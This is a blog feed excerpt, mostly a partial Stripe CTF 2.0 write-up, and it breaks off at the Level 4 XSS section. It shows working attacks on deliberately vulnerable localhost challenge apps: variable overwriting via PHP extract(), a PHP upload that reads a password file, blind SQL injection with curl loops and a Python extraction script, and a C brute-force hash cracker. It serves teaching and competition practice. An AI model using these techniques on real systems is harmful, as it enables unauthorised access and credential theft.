<p>But it is not restricted to files : the command is executed whenever the command
line matches a suffix alias. So, for example you can define :</p>
<pre><code>alias -s git=&#39;git clone&#39;</code></pre>
<p>… so that everytime you paste a URL ending in <code>git</code>, say
<code>git://git.debian.org/git/aptitude/aptitude.git</code>, it will be <code>git-clone</code>d.</p>]]></description>
    <pubDate>Tue, 17 Jan 2012 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2012-01-17-zsh-suffix-aliases.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Stripe CTF 2.0 (partial) writeup</title>
    <link>http://blog.emillon.org/posts/2012-08-30-stripe-ctf-2.0.html</link>
    <description><![CDATA[<p>The <a href="https://stripe.com/blog/capture-the-flag-20">Stripe CTF 2.0</a> is over ! Massive props to <a href="https://stripe.com/">Stripe</a> for this
great edition. I was stuck on level 5 but here is a humble writeup.</p>
<h2 id="level-0-the-secret-safe">Level 0 : the Secret Safe</h2>
<p>The first level is a web application written in <a href="https://nodejs.org/">node.js</a> that holds a
password in a SQLite database.</p>
<p>The error is in following line :</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode javascript"><code class="sourceCode javascript"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="kw">var</span> query <span class="op">=</span> <span class="st">&#39;SELECT * FROM secrets WHERE key LIKE ? || &quot;.%&quot;&#39;</span><span class="op">;</span></span></code></pre></div>
<p>“LIKE” interprets its argument as a regular expression. The solution is thus to
pass it a regular expression which matches everything : entering “%” reveals the
password.</p>
<h2 id="level-1-the-guessing-game">Level 1 : the Guessing Game</h2>
<p>Here we have the following PHP script :</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode php"><code class="sourceCode php"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="op">&lt;</span>html<span class="op">&gt;</span></span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a>  <span class="op">&lt;</span>head<span class="op">&gt;</span></span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a>    <span class="op">&lt;</span>title<span class="op">&gt;</span>Guessing Game<span class="op">&lt;/</span>title<span class="op">&gt;</span></span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a>  <span class="op">&lt;/</span>head<span class="op">&gt;</span></span>
<span id="cb2-5"><a href="#cb2-5" aria-hidden="true" tabindex="-1"></a>  <span class="op">&lt;</span>body<span class="op">&gt;</span></span>
<span id="cb2-6"><a href="#cb2-6" aria-hidden="true" tabindex="-1"></a>    <span class="op">&lt;</span>h1<span class="op">&gt;</span>Welcome to the Guessing Game<span class="op">!&lt;/</span>h1<span class="op">&gt;</span></span>
<span id="cb2-7"><a href="#cb2-7" aria-hidden="true" tabindex="-1"></a>    <span class="op">&lt;</span>p<span class="op">&gt;</span></span>
<span id="cb2-8"><a href="#cb2-8" aria-hidden="true" tabindex="-1"></a>      Guess the secret combination below<span class="ot">,</span> <span class="op">and</span> <span class="cf">if</span> you get it right<span class="ot">,</span></span>
<span id="cb2-9"><a href="#cb2-9" aria-hidden="true" tabindex="-1"></a>      you<span class="st">&#39;ll get the password to the next level!</span></span>
<span id="cb2-10"><a href="#cb2-10" aria-hidden="true" tabindex="-1"></a><span class="st">    &lt;/p&gt;</span></span>
<span id="cb2-11"><a href="#cb2-11" aria-hidden="true" tabindex="-1"></a><span class="st">    &lt;?php</span></span>
<span id="cb2-12"><a href="#cb2-12" aria-hidden="true" tabindex="-1"></a><span class="st">      $filename = &#39;</span>secret<span class="op">-</span>combination<span class="op">.</span>txt<span class="st">&#39;;</span></span>
<span id="cb2-13"><a href="#cb2-13" aria-hidden="true" tabindex="-1"></a><span class="st">      extract($_GET);</span></span>
<span id="cb2-14"><a href="#cb2-14" aria-hidden="true" tabindex="-1"></a><span class="st">      if (isset($attempt)) {</span></span>
<span id="cb2-15"><a href="#cb2-15" aria-hidden="true" tabindex="-1"></a><span class="st">        $combination = trim(file_get_contents($filename));</span></span>
<span id="cb2-16"><a href="#cb2-16" aria-hidden="true" tabindex="-1"></a><span class="st">        if ($attempt === $combination) {</span></span>
<span id="cb2-17"><a href="#cb2-17" aria-hidden="true" tabindex="-1"></a><span class="st">          echo &quot;&lt;p&gt;How did you know the secret combination was&quot; .</span></span>
<span id="cb2-18"><a href="#cb2-18" aria-hidden="true" tabindex="-1"></a><span class="st">               &quot; $combination!?&lt;/p&gt;&quot;;</span></span>
<span id="cb2-19"><a href="#cb2-19" aria-hidden="true" tabindex="-1"></a><span class="st">          $next = file_get_contents(&#39;</span>level02<span class="op">-</span>password<span class="op">.</span>txt<span class="st">&#39;);</span></span>
<span id="cb2-20"><a href="#cb2-20" aria-hidden="true" tabindex="-1"></a><span class="st">          echo &quot;&lt;p&gt;You&#39;</span>ve earned the password to the access Level <span class="dv">2</span><span class="ot">:</span><span class="st">&quot; .</span></span>
<span id="cb2-21"><a href="#cb2-21" aria-hidden="true" tabindex="-1"></a><span class="st">               &quot;</span> <span class="va">$next</span><span class="op">&lt;/</span>p<span class="op">&gt;</span><span class="st">&quot;;</span></span>
<span id="cb2-22"><a href="#cb2-22" aria-hidden="true" tabindex="-1"></a><span class="st">        } else {</span></span>
<span id="cb2-23"><a href="#cb2-23" aria-hidden="true" tabindex="-1"></a><span class="st">          echo &quot;</span><span class="op">&lt;</span>p<span class="op">&gt;</span>Incorrect<span class="op">!</span> The secret combination is not <span class="va">$attempt</span><span class="op">&lt;/</span>p<span class="op">&gt;</span><span class="st">&quot;;</span></span>
<span id="cb2-24"><a href="#cb2-24" aria-hidden="true" tabindex="-1"></a><span class="st">        }</span></span>
<span id="cb2-25"><a href="#cb2-25" aria-hidden="true" tabindex="-1"></a><span class="st">      }</span></span>
<span id="cb2-26"><a href="#cb2-26" aria-hidden="true" tabindex="-1"></a><span class="st">    ?&gt;</span></span>
<span id="cb2-27"><a href="#cb2-27" aria-hidden="true" tabindex="-1"></a><span class="st">    &lt;form action=&quot;</span><span class="co">#&quot; method=&quot;GET&quot;&gt;</span></span>
<span id="cb2-28"><a href="#cb2-28" aria-hidden="true" tabindex="-1"></a>      <span class="op">&lt;</span>p<span class="op">&gt;&lt;</span>input type<span class="op">=</span><span class="st">&quot;text&quot;</span> name<span class="op">=</span><span class="st">&quot;attempt&quot;</span><span class="op">&gt;&lt;/</span>p<span class="op">&gt;</span></span>
<span id="cb2-29"><a href="#cb2-29" aria-hidden="true" tabindex="-1"></a>      <span class="op">&lt;</span>p<span class="op">&gt;&lt;</span>input type<span class="op">=</span><span class="st">&quot;submit&quot;</span> value<span class="op">=</span><span class="st">&quot;Guess!&quot;</span><span class="op">&gt;&lt;/</span>p<span class="op">&gt;</span></span>
<span id="cb2-30"><a href="#cb2-30" aria-hidden="true" tabindex="-1"></a>    <span class="op">&lt;/</span>form<span class="op">&gt;</span></span>
<span id="cb2-31"><a href="#cb2-31" aria-hidden="true" tabindex="-1"></a>  <span class="op">&lt;/</span>body<span class="op">&gt;</span></span>
<span id="cb2-32"><a href="#cb2-32" aria-hidden="true" tabindex="-1"></a><span class="op">&lt;/</span>html<span class="op">&gt;</span></span></code></pre></div>
<p>The intent is that the script receives an “attempt” parameter, reads a file and
compares the attempt with the file contents. But it uses a very insecure method
of doing so : the function <code>extract</code> copies its associative array argument
directly into the symbol table.</p>
<p>For example, the following script :</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode php"><code class="sourceCode php"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="kw">&lt;?php</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="va">$vars</span> <span class="op">=</span> <span class="dt">array</span>(<span class="st">&#39;a&#39;</span> =&gt; <span class="dv">2</span><span class="ot">,</span> <span class="st">&#39;b&#39;</span> =&gt; <span class="st">&#39;foo&#39;</span>)<span class="ot">;</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="fu">extract</span>(<span class="va">$vars</span>)<span class="ot">;</span></span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="kw">echo</span> <span class="st">&quot;a = </span><span class="va">$a</span><span class="st">, b = </span><span class="va">$b</span><span class="sc">\n</span><span class="st">&quot;</span><span class="ot">;</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="kw">?&gt;</span></span></code></pre></div>
<p>outputs :</p>
<pre><code>a = 2, b = foo</code></pre>
<p>As the argument <code>$_GET</code> is controlled by the attacker, it means that we can
overwrite any variable, including <code>$filename</code>. By providing the script the name
of another file whose contents are known, we can bypass the check. There’s a
very good candidate for such a file : <code>index.php</code> itself.</p>
<p>So, let’s url-encode the file (we also have to trim the last newline) and issue
the following GET request with curl :</p>
<pre><code>% curl localhost:8000/index.php \
    -G \
    -d filename=index.php \
    -d attempt=$(perl -MURI::Escape \
        -e &#39;{local $/; $_=&lt;&gt;;} chomp; print uri_escape $_&#39; \
        &lt;index.php)
[...]
&lt;/html&gt;!?&lt;/p&gt;&lt;p&gt;You&#39;ve earned the password to the access Level 2: dummy-password
[...]</code></pre>
<h2 id="level-2-the-social-network">Level 2 : the Social Network</h2>
<p>Level 2 is a small script, also in PHP, where you can upload a picture and
display it. But it’s also done in an insecure way :</p>
<ul>
<li>the files are uploaded in a visible folder</li>
<li>any file extension is allowed</li>
<li>the server will execute everything with a <code>.php</code> extension</li>
</ul>
<p>Have a small idea ? :) We can write a PHP script, upload it and execute from the
upload directory. If it contains code to read the secret password, we’re done :</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode php"><code class="sourceCode php"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="kw">&lt;?php</span></span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a><span class="kw">echo</span> (<span class="fu">file_get_contents</span>(<span class="st">&quot;../password.txt&quot;</span>))<span class="ot">;</span></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a><span class="kw">?&gt;</span></span></code></pre></div>
<h2 id="level-3-the-secret-vault">Level 3 : the Secret Vault</h2>
<p>The next level is a small application where you enter a login and a password,
and if it matches one in the database, you have access to a secret. This time it
is written in Python, using the <a href="http://flask.pocoo.org/">Flask</a> microframework. Better than PHP but it
seems that the (fictional) developer has never heard about SQL injections !</p>
<p>The relevant lines are :</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a>query <span class="op">=</span> <span class="st">&quot;&quot;&quot;SELECT id, password_hash, salt FROM users</span></span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="st">           WHERE username = &#39;</span><span class="sc">{0}</span><span class="st">&#39; LIMIT 1&quot;&quot;&quot;</span>.<span class="bu">format</span>(username)</span>
<span id="cb7-3"><a href="#cb7-3" aria-hidden="true" tabindex="-1"></a>cursor.execute(query)</span>
<span id="cb7-4"><a href="#cb7-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb7-5"><a href="#cb7-5" aria-hidden="true" tabindex="-1"></a>res <span class="op">=</span> cursor.fetchone()</span>
<span id="cb7-6"><a href="#cb7-6" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="kw">not</span> res:</span>
<span id="cb7-7"><a href="#cb7-7" aria-hidden="true" tabindex="-1"></a>    <span class="cf">return</span> <span class="st">&quot;There&#39;s no such user </span><span class="sc">{0}</span><span class="st">!</span><span class="ch">\n</span><span class="st">&quot;</span>.<span class="bu">format</span>(username)</span>
<span id="cb7-8"><a href="#cb7-8" aria-hidden="true" tabindex="-1"></a>user_id, password_hash, salt <span class="op">=</span> res</span>
<span id="cb7-9"><a href="#cb7-9" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb7-10"><a href="#cb7-10" aria-hidden="true" tabindex="-1"></a>calculated_hash <span class="op">=</span> hashlib.sha256(password <span class="op">+</span> salt)</span>
<span id="cb7-11"><a href="#cb7-11" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> calculated_hash.hexdigest() <span class="op">!=</span> password_hash:</span>
<span id="cb7-12"><a href="#cb7-12" aria-hidden="true" tabindex="-1"></a>    <span class="cf">return</span> <span class="st">&quot;That&#39;s not the password for </span><span class="sc">{0}</span><span class="st">!</span><span class="ch">\n</span><span class="st">&quot;</span>.<span class="bu">format</span>(username)</span></code></pre></div>
<p>The query is vulnerable to SQL injections : if <code>username</code> contains a quote, it
will close the other one. For example, if it is <code>' OR 1=1 --</code>, the full query
will be a valid one : <code>SELECT id, password_hash, salt FROM users WHERE username = '' OR 1=1 --' LIMIT 1""".format(username)</code>.</p>
<pre><code>% curl http://localhost:5000/login -d &quot;username=&#39; OR 1=1 --&quot; -d password=foo
That&#39;s not the password for &#39; OR 1=1 --!</code></pre>
<p>Note that the error message is different when the query evaluates to something
false :</p>
<pre><code>% curl http://localhost:5000/login -d &quot;username=&#39; OR 1=2 --&quot; -d password=foo
There&#39;s no such user &#39; OR 1=2 --!</code></pre>
<p>This means that we have a way to evaluate arbitrary (boolean) expressions. Using
subqueries, we can get information from the database :</p>
<pre><code>% curl http://localhost:5000/login \
  -d &quot;username=&#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39;) --&quot;\
  -d password=foo
That&#39;s not the password for &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39;) --!
% curl http://localhost:5000/login \
  -d &quot;username=&#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;alice&#39;) --&quot;\
  -d password=foo
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;alice&#39;) --!</code></pre>
<p>The DB contains a user named “bob” but no user named “alice”. What about his
password hash?</p>
<pre><code>% for p in $(seq 0 9) a b c d e f ; do
curl http://localhost:5000/login \
  -d &quot;username=&#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;$p%&#39;) --&quot;\
  -d password=foo
done
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;0%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;1%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;2%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;3%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;4%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;5%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;6%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;7%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;8%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;9%&#39;) --!
That&#39;s not the password for &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;a%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;b%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;c%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;d%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;e%&#39;) --!
There&#39;s no such user &#39; OR 1=(SELECT COUNT(*) FROM users WHERE username=&#39;bob&#39; AND password_hash LIKE &#39;f%&#39;) --!</code></pre>
<p>So, the hash starts by a “a”. By scripting this, we can get bob’s password hash
and salt (from <code>generate_data.py</code> we know that the salt and the password are
made of 7 lowercase letters).</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb12-1"><a href="#cb12-1" aria-hidden="true" tabindex="-1"></a><span class="co">#!/usr/bin/env python</span></span>
<span id="cb12-2"><a href="#cb12-2" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> hashlib</span>
<span id="cb12-3"><a href="#cb12-3" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> itertools</span>
<span id="cb12-4"><a href="#cb12-4" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> requests</span>
<span id="cb12-5"><a href="#cb12-5" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> string</span>
<span id="cb12-6"><a href="#cb12-6" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-7"><a href="#cb12-7" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> is_ok(query):</span>
<span id="cb12-8"><a href="#cb12-8" aria-hidden="true" tabindex="-1"></a>    full_query <span class="op">=</span> <span class="st">&quot;&#39; OR 1=&quot;</span> <span class="op">+</span> query <span class="op">+</span> <span class="st">&quot; --&quot;</span></span>
<span id="cb12-9"><a href="#cb12-9" aria-hidden="true" tabindex="-1"></a>    payload <span class="op">=</span> {<span class="st">&#39;username&#39;</span>: full_query, <span class="st">&#39;password&#39;</span> : <span class="st">&#39;foo&#39;</span> }</span>
<span id="cb12-10"><a href="#cb12-10" aria-hidden="true" tabindex="-1"></a>    url <span class="op">=</span> <span class="st">&quot;http://localhost:5000/login&quot;</span></span>
<span id="cb12-11"><a href="#cb12-11" aria-hidden="true" tabindex="-1"></a>    r <span class="op">=</span> requests.post(url, data<span class="op">=</span>payload)</span>
<span id="cb12-12"><a href="#cb12-12" aria-hidden="true" tabindex="-1"></a>    <span class="cf">return</span> <span class="st">&quot;not the password for&quot;</span> <span class="kw">in</span> r.text</span>
<span id="cb12-13"><a href="#cb12-13" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-14"><a href="#cb12-14" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> next_char(user, field, chars, prefix):</span>
<span id="cb12-15"><a href="#cb12-15" aria-hidden="true" tabindex="-1"></a>    <span class="cf">for</span> c <span class="kw">in</span> chars:</span>
<span id="cb12-16"><a href="#cb12-16" aria-hidden="true" tabindex="-1"></a>        q <span class="op">=</span> <span class="st">&quot;(SELECT COUNT(*) FROM users &quot;</span><span class="op">\</span></span>
<span id="cb12-17"><a href="#cb12-17" aria-hidden="true" tabindex="-1"></a>            <span class="op">+</span> <span class="st">&quot;WHERE username = &#39;</span><span class="sc">{0}</span><span class="st">&#39; &quot;</span><span class="op">\</span></span>
<span id="cb12-18"><a href="#cb12-18" aria-hidden="true" tabindex="-1"></a>            <span class="op">+</span> <span class="st">&quot;AND </span><span class="sc">{1}</span><span class="st"> LIKE &#39;</span><span class="sc">{2}{3}</span><span class="st">%&#39;)&quot;</span></span>
<span id="cb12-19"><a href="#cb12-19" aria-hidden="true" tabindex="-1"></a>        <span class="cf">if</span> is_ok(q.<span class="bu">format</span>(user, field, prefix, c)):</span>
<span id="cb12-20"><a href="#cb12-20" aria-hidden="true" tabindex="-1"></a>            <span class="cf">return</span> c</span>
<span id="cb12-21"><a href="#cb12-21" aria-hidden="true" tabindex="-1"></a>    <span class="bu">print</span> prefix</span>
<span id="cb12-22"><a href="#cb12-22" aria-hidden="true" tabindex="-1"></a>    <span class="cf">return</span> <span class="va">None</span> </span>
<span id="cb12-23"><a href="#cb12-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-24"><a href="#cb12-24" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> crack(user, field, chars):</span>
<span id="cb12-25"><a href="#cb12-25" aria-hidden="true" tabindex="-1"></a>    prefix <span class="op">=</span> <span class="st">&#39;&#39;</span></span>
<span id="cb12-26"><a href="#cb12-26" aria-hidden="true" tabindex="-1"></a>    <span class="cf">while</span> <span class="va">True</span>:</span>
<span id="cb12-27"><a href="#cb12-27" aria-hidden="true" tabindex="-1"></a>        c <span class="op">=</span> next_char(user, field, chars, prefix)</span>
<span id="cb12-28"><a href="#cb12-28" aria-hidden="true" tabindex="-1"></a>        <span class="cf">if</span> c <span class="kw">is</span> <span class="va">None</span>:</span>
<span id="cb12-29"><a href="#cb12-29" aria-hidden="true" tabindex="-1"></a>            <span class="cf">return</span></span>
<span id="cb12-30"><a href="#cb12-30" aria-hidden="true" tabindex="-1"></a>        prefix <span class="op">+=</span> c</span>
<span id="cb12-31"><a href="#cb12-31" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-32"><a href="#cb12-32" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="va">__name__</span> <span class="op">==</span> <span class="st">&#39;__main__&#39;</span>:</span>
<span id="cb12-33"><a href="#cb12-33" aria-hidden="true" tabindex="-1"></a>    crack(<span class="st">&#39;bob&#39;</span>, <span class="st">&#39;password_hash&#39;</span>, string.hexdigits)</span>
<span id="cb12-34"><a href="#cb12-34" aria-hidden="true" tabindex="-1"></a>    crack(<span class="st">&#39;bob&#39;</span>, <span class="st">&#39;salt&#39;</span>, string.ascii_lowercase)</span></code></pre></div>
<p>And the output is something like :</p>
<pre><code>% ./level3.py
aee3d87d877c39d68e49c2c6e47789de3de40a73e2970fe2355011649932f5bb
zxqtgxi</code></pre>
<p>Gereating all strings and their hashes is a bit too slow in Python, so I put
together a small C program to do the heavy work.</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode c"><code class="sourceCode c"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="pp">#include </span><span class="im">&lt;openssl/sha.h&gt;</span></span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a><span class="pp">#include </span><span class="im">&lt;string.h&gt;</span></span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a><span class="pp">#include </span><span class="im">&lt;stdio.h&gt;</span></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="pp">#include </span><span class="im">&lt;stdlib.h&gt;</span></span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a><span class="dt">int</span> main<span class="op">(</span><span class="dt">int</span> argc<span class="op">,</span> <span class="dt">char</span> <span class="op">**</span>argv<span class="op">)</span></span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a><span class="op">{</span></span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-9"><a href="#cb14-9" aria-hidden="true" tabindex="-1"></a>    <span class="dt">char</span> salt<span class="op">[]</span> <span class="op">=</span> <span class="st">&quot;zxqtgxi&quot;</span><span class="op">;</span></span>
<span id="cb14-10"><a href="#cb14-10" aria-hidden="true" tabindex="-1"></a>    <span class="dt">unsigned</span> <span class="dt">char</span> expected_hash<span class="op">[]</span> <span class="op">=</span></span>
<span id="cb14-11"><a href="#cb14-11" aria-hidden="true" tabindex="-1"></a>        <span class="st">&quot;</span><span class="sc">\xae\xe3\xd8\x7d\x87\x7c\x39\xd6</span><span class="st">&quot;</span></span>
<span id="cb14-12"><a href="#cb14-12" aria-hidden="true" tabindex="-1"></a>        <span class="st">&quot;</span><span class="sc">\x8e\x49\xc2\xc6\xe4\x77\x89\xde</span><span class="st">&quot;</span></span>
<span id="cb14-13"><a href="#cb14-13" aria-hidden="true" tabindex="-1"></a>        <span class="st">&quot;</span><span class="sc">\x3d\xe4\x0a\x73\xe2\x97\x0f\xe2</span><span class="st">&quot;</span></span>
<span id="cb14-14"><a href="#cb14-14" aria-hidden="true" tabindex="-1"></a>        <span class="st">&quot;</span><span class="sc">\x35\x50\x11\x64\x99\x32\xf5\xbb</span><span class="st">&quot;</span><span class="op">;</span></span>
<span id="cb14-15"><a href="#cb14-15" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-16"><a href="#cb14-16" aria-hidden="true" tabindex="-1"></a>    <span class="dt">char</span> s<span class="op">[</span><span class="dv">15</span><span class="op">];</span></span>
<span id="cb14-17"><a href="#cb14-17" aria-hidden="true" tabindex="-1"></a>    memcpy<span class="op">(&amp;</span>s<span class="op">[</span><span class="dv">7</span><span class="op">],</span> salt<span class="op">,</span> <span class="dv">7</span><span class="op">);</span></span>
<span id="cb14-18"><a href="#cb14-18" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-19"><a href="#cb14-19" aria-hidden="true" tabindex="-1"></a>    <span class="dt">unsigned</span> <span class="dt">char</span> hash<span class="op">[</span>SHA256_DIGEST_LENGTH<span class="op">];</span></span>
<span id="cb14-20"><a href="#cb14-20" aria-hidden="true" tabindex="-1"></a>    SHA256_CTX sha256<span class="op">;</span></span>
<span id="cb14-21"><a href="#cb14-21" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-22"><a href="#cb14-22" aria-hidden="true" tabindex="-1"></a><span class="pp">#define LOOP</span><span class="op">(</span><span class="pp">n</span><span class="op">)</span><span class="pp"> </span><span class="cf">for</span><span class="op">(</span><span class="pp">s</span><span class="op">[</span><span class="pp">n</span><span class="op">]=</span><span class="ch">&#39;a&#39;</span><span class="op">;</span><span class="pp">s</span><span class="op">[</span><span class="pp">n</span><span class="op">]&lt;=</span><span class="ch">&#39;z&#39;</span><span class="op">;</span><span class="pp">s</span><span class="op">[</span><span class="pp">n</span><span class="op">]++)</span></span>
<span id="cb14-23"><a href="#cb14-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-24"><a href="#cb14-24" aria-hidden="true" tabindex="-1"></a>    LOOP<span class="op">(</span><span class="dv">0</span><span class="op">)</span> LOOP<span class="op">(</span><span class="dv">1</span><span class="op">)</span> LOOP<span class="op">(</span><span class="dv">2</span><span class="op">)</span></span>
<span id="cb14-25"><a href="#cb14-25" aria-hidden="true" tabindex="-1"></a>    LOOP<span class="op">(</span><span class="dv">3</span><span class="op">)</span> LOOP<span class="op">(</span><span class="dv">4</span><span class="op">)</span> LOOP<span class="op">(</span><span class="dv">5</span><span class="op">)</span></span>
<span id="cb14-26"><a href="#cb14-26" aria-hidden="true" tabindex="-1"></a>    LOOP<span class="op">(</span><span class="dv">6</span><span class="op">)</span> <span class="op">{</span></span>
<span id="cb14-27"><a href="#cb14-27" aria-hidden="true" tabindex="-1"></a>        SHA256_Init<span class="op">(&amp;</span>sha256<span class="op">);</span></span>
<span id="cb14-28"><a href="#cb14-28" aria-hidden="true" tabindex="-1"></a>        SHA256_Update<span class="op">(&amp;</span>sha256<span class="op">,</span> s<span class="op">,</span> <span class="dv">14</span><span class="op">);</span></span>
<span id="cb14-29"><a href="#cb14-29" aria-hidden="true" tabindex="-1"></a>        SHA256_Final<span class="op">(</span>hash<span class="op">,</span> <span class="op">&amp;</span>sha256<span class="op">);</span></span>
<span id="cb14-30"><a href="#cb14-30" aria-hidden="true" tabindex="-1"></a>        <span class="cf">if</span><span class="op">(!</span>memcmp<span class="op">(</span>hash<span class="op">,</span> expected_hash<span class="op">,</span></span>
<span id="cb14-31"><a href="#cb14-31" aria-hidden="true" tabindex="-1"></a>                    SHA256_DIGEST_LENGTH<span class="op">))</span> <span class="op">{</span></span>
<span id="cb14-32"><a href="#cb14-32" aria-hidden="true" tabindex="-1"></a>            printf<span class="op">(</span><span class="st">&quot;FOUND : </span><span class="sc">%s\n</span><span class="st">&quot;</span><span class="op">,</span> s<span class="op">);</span></span>
<span id="cb14-33"><a href="#cb14-33" aria-hidden="true" tabindex="-1"></a>            exit<span class="op">(</span><span class="dv">0</span><span class="op">);</span></span>
<span id="cb14-34"><a href="#cb14-34" aria-hidden="true" tabindex="-1"></a>        <span class="op">}</span></span>
<span id="cb14-35"><a href="#cb14-35" aria-hidden="true" tabindex="-1"></a>    <span class="op">}</span></span>
<span id="cb14-36"><a href="#cb14-36" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-37"><a href="#cb14-37" aria-hidden="true" tabindex="-1"></a>    <span class="cf">return</span> <span class="dv">0</span><span class="op">;</span></span>
<span id="cb14-38"><a href="#cb14-38" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>A few minutes later, we have the answer.</p>
<h2 id="level-4-the-karma-trader">Level 4 : the Karma Trader</h2>
<p>New level, new language : Ruby this time. In the application written with the
<a href="http://www.sinatrarb.com/">Sinatra</a> framework, you can create accounts and transfer an amount of karma to
another user, with the rule that once you transferred karma to a user, he can
see your password. The goal is to get <em>karma_fountain</em>’s password, with the
indication that he logs in often.</p>
<p>This is a good indication that it will be a XSS attack in <em>karma_fountain</em>’s
browser : by injecting a piece of javascript into the page, we’ll fill and
submit the transfer form. The obvious vector is the username ; alas it is
filtered :</p>
